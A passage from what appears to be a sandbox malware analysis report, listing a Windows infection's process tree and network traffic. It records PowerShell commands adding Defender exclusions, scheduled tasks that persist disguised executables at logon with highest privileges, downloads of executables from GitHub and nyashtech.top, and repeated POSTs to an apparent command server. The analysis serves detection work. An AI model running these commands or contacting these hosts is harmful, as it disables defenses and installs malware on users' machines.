      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o1qi5bya\o1qi5bya.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2888
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCCC1.tmp" "c:\Users\Admin\AppData\Roaming\CSC822C774E6EF8464ABE2CAFDAB94B17E0.TMP"
        7⤵
        
        PID:2744
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u0bt5obn\u0bt5obn.cmdline"
        6⤵
        Drops file in System32 directory
        Suspicious use of WriteProcessMemory
        
        PID:2600
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCD1F.tmp" "c:\Windows\System32\CSC2E69B58315646D698906C5467A14A6.TMP"
        7⤵
        
        PID:2652
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\dllhost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2912
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\WmiPrvSE.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:848
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\services.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1244
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\Services\spoolsv.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1960
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\Dettex.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1204
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1524
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dnXxvW4kMW.bat"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1600
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:1624
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:1792
        
        C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\WmiPrvSE.exe
        
        "C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\WmiPrvSE.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2152

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1840

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\MSOCache\All Users\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2640

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\Services\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1852

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Services\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2896

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Common Files\Services\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2648

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DettexD" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\Dettex.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Dettex" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\Dettex.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DettexD" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\Dettex.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "hyperSurrogateagentCrth" /sc MINUTE /mo 12 /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "hyperSurrogateagentCrt" /sc ONLOGON /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1972

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "hyperSurrogateagentCrth" /sc MINUTE /mo 11 /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1392

Network

DNS

ip-api.com

Dettex.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/line/?fields=hosting

Dettex.exe

Remote address:

208.95.112.1:80

Request

GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 19 Jan 2025 13:39:33 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

wide-casting.gl.at.ply.gg

Dettex.exe

Remote address:

8.8.8.8:53

Request

wide-casting.gl.at.ply.gg

IN A

Response

wide-casting.gl.at.ply.gg

IN A

147.185.221.25
DNS

github.com

Dettex.exe

Remote address:

8.8.8.8:53

Request

github.com

IN A

Response

github.com

IN A

20.26.156.215
DNS

951499cm.nyashtech.top

WmiPrvSE.exe

Remote address:

8.8.8.8:53

Request

951499cm.nyashtech.top

IN A

Response

951499cm.nyashtech.top

IN A

37.44.238.250
GET

https://github.com/tvoidrug2024/-/raw/main/winplayit.exe

Dettex.exe

Remote address:

20.26.156.215:443

Request

GET /tvoidrug2024/-/raw/main/winplayit.exe HTTP/1.1
Host: github.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

Server: GitHub.com
Date: Sun, 19 Jan 2025 13:40:14 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin:
Location: https://raw.githubusercontent.com/tvoidrug2024/-/main/winplayit.exe
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: 25BF:558AD:51E06:6452A:678D00BE
GET

http://951499cm.nyashtech.top/PollGeoDbwordpressTemporary/8acca55a18a7a5a5daded82286ad2bee8fcfc279fd574b02bf162c5e6f38c71e0671e9fee21b07df

Dettex.exe

Remote address:

37.44.238.250:80

Request

GET /PollGeoDbwordpressTemporary/8acca55a18a7a5a5daded82286ad2bee8fcfc279fd574b02bf162c5e6f38c71e0671e9fee21b07df HTTP/1.1
Host: 951499cm.nyashtech.top
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:40:14 GMT
Content-Length: 2284821
Connection: keep-alive
Last-Modified: Wed, 19 Jun 2024 10:10:38 GMT
ETag: "22dd15-61b3b68f581b3"
Accept-Ranges: bytes
DNS

raw.githubusercontent.com

Dettex.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.109.133

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.108.133
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 336
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:40:50 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1360
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 384
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:40:51 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1348
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:40:51 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:40:52 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:40:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1972
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:40:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:40:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:40:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:40:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:04 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:07 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:08 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:09 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:13 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 951499cm.nyashtech.top
Content-Length: 1984
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 Jan 2025 13:41:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
POST

http://951499cm.nyashtech.top/sqlcentralUploads.php

WmiPrvSE.exe

Remote address:

37.44.238.250:80

Request

POST /sqlcentralUploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
